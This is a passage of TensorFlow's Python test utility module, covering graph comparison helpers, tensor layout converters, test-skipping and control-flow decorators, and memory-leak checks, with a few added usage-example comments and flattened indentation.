from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import _pywrap_stacktrace_handler
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import _pywrap_util_port
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable/disable MLIR
# compilation.
def is_mlir_bridge_enabled():
return None
try:
from tensorflow.python.framework.is_mlir_bridge_test_false import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
pass
def _get_object_count_by_type(exclude=()):
return (
collections.Counter([type(obj).__name__ for obj in gc.get_objects()]) -
collections.Counter([type(obj).__name__ for obj in exclude]))
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
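# Illustrative sketch (not part of the original module): `expected_ops` maps an
# op *name* to its op *type*, so a typical call looks like
#
#   assert_ops_in_graph({"my_const": "Const", "my_matmul": "MatMul"},
#                       ops.get_default_graph())
#
# The op names above are hypothetical; a ValueError is raised if any expected
# op is missing or has a different type.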
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(compat.as_bytes(_SHARDED_SAVE_OP_PATTERN),
attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(compat.as_bytes(_TABLE_SHARED_NAME_PATTERN),
node.attr["shared_name"].s):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 3-, 4-, or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {3: [0, 2, 1], 4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
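# Illustrative sketch (not part of the original module): with the axis orders
# defined above, a 4-D NHWC shape [batch, height, width, channels] becomes
# NCHW, e.g.
#
#   NHWCToNCHW([32, 28, 28, 3])  # -> [32, 3, 28, 28]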
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
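# Illustrative sketch (not part of the original module): the channel dimension
# is split into groups of 4 and the group count moves next to the batch axis,
# so a 4-D NHWC shape whose last dimension is divisible by 4 transforms as
#
#   NHWCToNCHW_VECT_C([8, 7, 7, 32])  # -> [8, 8, 7, 7, 4]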
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
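# Illustrative sketch (not part of the original module): skipping a test unless
# a GPU is present. The test class and method names below are hypothetical.
#
#   class MatmulTest(googletest.TestCase):
#
#     @skip_if(lambda: not is_gpu_available())
#     def test_large_matmul_on_gpu(self):
#       ...
#
# Note that a skipped method simply returns None without running; it is not
# reported to the test runner as skipped.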
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
else:
raise
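# Illustrative sketch (not part of the original module): tolerating a flaky
# UnavailableError inside a test body, where `self` is the running test case
# and `some_remote_op` is a hypothetical tensor.
#
#   with skip_if_error(self, errors.UnavailableError,
#                      messages=["socket closed", "connection reset"]):
#     self.evaluate(some_remote_op)
#
# Any other exception type, or an UnavailableError whose message contains
# neither string, propagates normally.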
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The number of warmup iterations, excluded from measurement.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Some objects are newly created by _get_object_count_by_type(). So
# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
# unittest.doCleanups adds to self._outcome with each unwound call.
# These objects are retained across gc collections so we exclude them
# from the object count calculation.
obj_count_by_type = _get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped))
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = (
_get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped)) -
obj_count_by_type)
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
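# Illustrative sketch (not part of the original module): the decorator can be
# applied bare or with an explicit warmup count. The method names below are
# hypothetical.
#
#   class LeakTest(googletest.TestCase):
#
#     @assert_no_new_pyobjects_executing_eagerly
#     def test_op_does_not_leak(self):
#       ...
#
#     @assert_no_new_pyobjects_executing_eagerly(warmup_iters=5)
#     def test_op_with_larger_caches(self):
#       ...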
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except (ReferenceError, AttributeError):
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, denylist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(denylist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in denylist:
if b is obj:
return "<test code>"
if obj is denylist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, denylist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
denylist: same as denylist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, denylist):
return "{}{}".format(get_ignore_reason(obj, denylist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, denylist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
denylist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
denylist = denylist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, denylist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, denylist)
reprs[r_id] = describe(r, denylist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
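# Illustrative sketch (not part of the original module): keyword arguments are
# expanded into the cross product of their values, e.g.
#
#   _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
#   # -> [OrderedDict([("mode", "graph"), ("use_gpu", True)]),
#   #     OrderedDict([("mode", "eager"), ("use_gpu", True)])]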
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
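# Illustrative sketch (not part of the original module): the same combinations
# as above, but each dictionary also carries a "testcase_name" built from the
# alphanumeric characters of its keys and values, e.g.
#
#   generate_combinations_with_testcase_name(mode=["graph", "eager"])
#   # -> [OrderedDict([("mode", "graph"), ("testcase_name", "_test_mode_graph")]),
#   #     OrderedDict([("mode", "eager"), ("testcase_name", "_test_mode_eager")])]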
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically check
the generated graph. Attempting to evaluate graph or function results via
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
raise ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def eager_lazy_remote_copy_on_and_off(f):
"""Execute the test method w/o lazy tensor copy for function remote inputs."""
@parameterized.named_parameters([("WithLazyRemoteCopy", True), ("", False)])
@functools.wraps(f)
def decorator(self, lazily_remote_copy, *args, **kwargs):
if lazily_remote_copy:
context.context().lazy_remote_inputs_copy = True
else:
context.context().lazy_remote_inputs_copy = False
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
